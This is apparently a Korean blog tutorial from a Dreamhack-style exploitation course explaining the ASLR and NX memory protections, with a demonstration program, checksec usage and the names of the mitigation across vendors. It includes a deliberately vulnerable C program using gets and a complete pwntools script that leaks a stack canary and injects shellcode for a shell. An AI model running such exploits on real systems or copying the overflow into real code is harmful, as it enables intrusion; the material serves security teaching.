Mitigation: NX & ASLR

시스템 보안은 지난 수년간 발전해온 공격 기법과 보호 기법의 발전 양상을 보시면..
어떤 보호 기법이 등장하면 우회 기술도 등장합니다.. 이렇게 어떤 공격이 올지 모르기에
시스템 개발자들은 여러 겺의 보호 기법을 적용해 시스템이 공격당할 수 있는 표현 자체↓

 

이전에 글을 보시면 r2s를 통한 공격이 가능했기에 더 어렵게 하기 위해선
공격자가 메모리에 임의 버퍼 주소 알기 힘들게, 메모리 영역에 불필요한 실행 권한 제거

Exploit Tech: Return to Shellcode

이와 관련된 보호기법으로 우리는 ASLR과 NX를 배워볼께요

---

ASLR

Address Space Layout Randomization의 약어

바이너리가 실행될 때마다 스택/힙/공유 lib 등을 임의의 주소에 할당한 보호기법!!

ALSR은 커널에서 지원하는 보호 기법이며, 다음의 명령어로 확인하실 수 있습니다.

cat /proc/sys/kernel/randomize_va_space

리눅스에선 이 값은 0, 1 또는 2를 가즈며, 각 ASLR이 적용되는 메모리 영역은 다음과 같습니다.

• No ASLR(0) : ASLR을 적용 X
• Conservative Randomization(1) : 스택, 힙, lib, vdso etc..
• Conservative Randomization + brk(2) : (1)의 영역과 brk로 할당한 영역

참고로 brk와 관련된 자료는 아래 링크를 통해 보시면 됩니다.

[ Linux System Call ] brk, sbrk

자세한 특징은 아래 예제를 통해 ASLR에 대하여 알아봅시다

// Name: addr.c
// Compile: gcc addr.c -o addr -ldl -no-pie -fno-PIE
 
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
 
int main() {
  char buf_stack[0x10];                   // 스택 버퍼
  char *buf_heap = (char *)malloc(0x10);  // 힙 버퍼
 
  printf("buf_stack addr: %p\n", buf_stack);
  printf("buf_heap addr: %p\n", buf_heap);
 
  printf("libc_base addr: %p\n",
         *(void **)dlopen("libc.so.6", RTLD_LAZY));  // 라이브러리 주소
 
  printf("printf addr: %p\n",
         dlsym(dlopen("libc.so.6", RTLD_LAZY),
               "printf"));  // 라이브러리 함수의 주소
 
  printf("main addr: %p\n", main);  // 코드 영역의 함수 주소
}

---

ASLR의 특징

addr.c코드는 메모리의 주소를 출력하는 코드로 컴파일 후 실행해보면..

 각 메모리 영역별로 잘 출력되었으며, 결과를 살펴보면 다음과 같은 특징이 있습니다.

 

• 코드 영역의 main함수를 제외한 다른 영역의 주소들은 실행마다 변경됨
  - 실행할 때마다 주소 변경되기에 바이너리를 실행 전에 해당 영역들의 주소 예측 불가
• 바이너리를 반복해 실행해도 printf 주소의 하위 12비트 값은 변경 X
  - 리눅스는 ASLR이 적용 시, 파일을 페이지(Page; 12비트) 단위로 임의 주소를 매핑함
• libc_base와 printf의 주소 차이는 항상 같음
  - ASLR이 적용 시 lib는 임의 주소에 매핑됨
  - lib 파일 그대로 매핑이 아닌 매핑된 주소로부터 lib의 다른 심폴들의 거리(Offset)은 항상 같음
  

---

NX(No-eXecute)

실행에 사용되는 메모리 영역과 쓰기에 사용되는 메모리 영역을 분리하는 보호 기법!!

어떤 메모리 영역에 대해 쓰기 권한과 실행 권한이 함께 있으면 시스템이 취약해지기 쉽죠
예를 들어, 코드 영역에 쓰기 권한이 있으면 공격자는 코드를 수정해 원하는 코드 실행 가능하며,
반대로 스택이나 데이터 영역에 실행 권한이 있으면 Return to Shellcode와 같은 공격 시도 가능!!

 

CPU가 NX를 지원하면 컴파일 옵션을 통해 바이너리에 NX를 적용할 수 있으며, NX 적용된 바이너리는
실행될 때 각 메모리 영역에 필요한 권한만을 부여받습니다.

 

gdb의 vmmap으로 NX 적용 전후의 메모리 맵을 비교하면, 다음과 같이 NX가 적용 전후의
메모리 맵을 비교하면, 다음과 같이 NX가 적용된 바이너리는..

 

코드 영역 외에 실행 권한이 없는 것을 확인할 수 있습니다. 반면, NX가 적용 X는 모든 영역에 존재!!

이건.. 뭔 에러 뜨면서 그냥 Dreamhack에서 발취했어요

---

Checksec을 이용한 NX 확인

checksec을 이용해 다음과 같이 바이너리에 NX가 적용됐는지 확인할 수 있습니다.

NX의 다양한 명칭

• 인텔 : XD(eXecute Disble)
• AMD : NX(No-eXecute)
• 윈도우 : DEP(Data Execution Prevention)
• ARM : XN(eXecute Never)

---

Return to Shellcode w/t NX

이전에 실습한 Return to shellcode의 예제인 r2s에 NX 보호기법을 적용 후,
동일 익스플로잇을 실행했을 때의 결과를 확인해봅시다.

// Name: r2s.c
// Compile: gcc -o r2s r2s.c -zexecstack
 
#include <stdio.h>
#include <unistd.h>
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
int main() {
  char buf[0x50];
 
  init();
 
  printf("Address of the buf: %p\n", buf);
  printf("Distance between buf and $rbp: %ld\n",
         (char*)__builtin_frame_address(0) - buf);
 
  printf("[1] Leak the canary\n");
  printf("Input: ");
  fflush(stdout);
 
  read(0, buf, 0x100);
  printf("Your input is '%s'\n", buf);
 
  puts("[2] Overwrite the return address");
  printf("Input: ");
  fflush(stdout);
  gets(buf);
 
  return 0;
}

r2s.c를 -zexecstack 옵션을 제거해 컴파일 후, checksec으로 확인해보면 NX가 활성화됨!!

이 바이너리를 대상으로 익스플로잇 코드를 실행하면, 다음과 같이 Segmentataion fault 발생!!
이는 NX가 적용되 스택 영역에 실행 권한이 사라지며, 셸코드가 실행 불가로 종료된 것이죠

#!/usr/bin/env python3
# Name : r2s.py
 
from pwn import *
def slog(n, m): return success(":".join([n, hex(m)]))
 
 
p = process('./r2s')
context(arch='amd64', os='linux')
e = ELF('./r2s')
 
 
#[1] Get information about buf
p.recvuntil("buf: ")
buf = int(p.recvline()[:-1], 16)
slog('Address of the buf', buf)
 
p.recvuntil('$rbp: ')
buf2_sfp = int(p.recvline().split()[0])
buf2_canary = buf2_sfp - 8
 
slog('buf <=> sfp', buf2_sfp)
slog('buf <=> canary', buf2_canary)
 
# [2] Leak canary value
payload = b"A"*(buf2_canary + 1)  # (+1) because of the first null-byte
p.sendafter("Input:", payload)
p.recvuntil(payload)
 
canary = u64(b"\x00"+p.recvn(7))
slog("Canary", canary)
 
# [3] Exploit
sh = asm(shellcraft.sh())
payload = sh.ljust(buf2_canary, b"A") + p64(canary) + b"B"*0x8 + p64(buf)
# gets() receives input until "\n" is received
p.sendlineafter("Input:", payload)
 
p.interactive()

 아.. 귀찮아서 파일 명 안 바꿨는데 바꾸시면.. 히히

이런 식으로 오류가.. 나면 안되는데 하.. 어쨌든 안된다는 걸 알았죠

Checksec을 해보면 NX의 적용 여부를 확인하실 수 있습니다. 그건 해보셔도 좋을거 같아요

---

마치며

NX와 ASLR이 적용되면 스택/힙/데이터 영역에 실행 권한 제거 및 할당 주소 계속 변함..
그러나 바이너리의 코드가 존재하는 영역은 여전히 실행 권한 존재!! 할당 주소도 고정!!
코드 영역엔 유용한 코드 가젯들과 함수도 포함되어 있습니다.

 

반환 주소를 셸 코드로 직접 덮는 대신, 이를 활용해 NX와 ASLR을 우회하는 공격도 있죠
관련된 대표적 공격 방법으론 RTL(Return-To-Libc)과 ROP(Return Oriented Programming)!

키워드

• Address Space Layout Randomization(ASLR)
  - 메모리를 무작위 주소에 할당하는 보호 기법.
  - 최신 커널들은 대부분 적용되어 있음.
  - 리눅스에서는 페이지 단위로 할당이 이루어지므로 하위 12비트는 변하지 않는다는 특징이 있음.
• NX(No-eXecute bit)
  - 프로세스의 각 세그먼트에 필요한 권한만 부여하는 보호 기법.
  - 일반적으로 코드 영역에는 읽기와 실행을, 나머지 영역에는 읽기와 쓰기 권한이 부여됨.

---

참고 자료

Mitigation: NX & ASLR

 

[ Linux System Call ] brk, sbrk

 

참고 이미지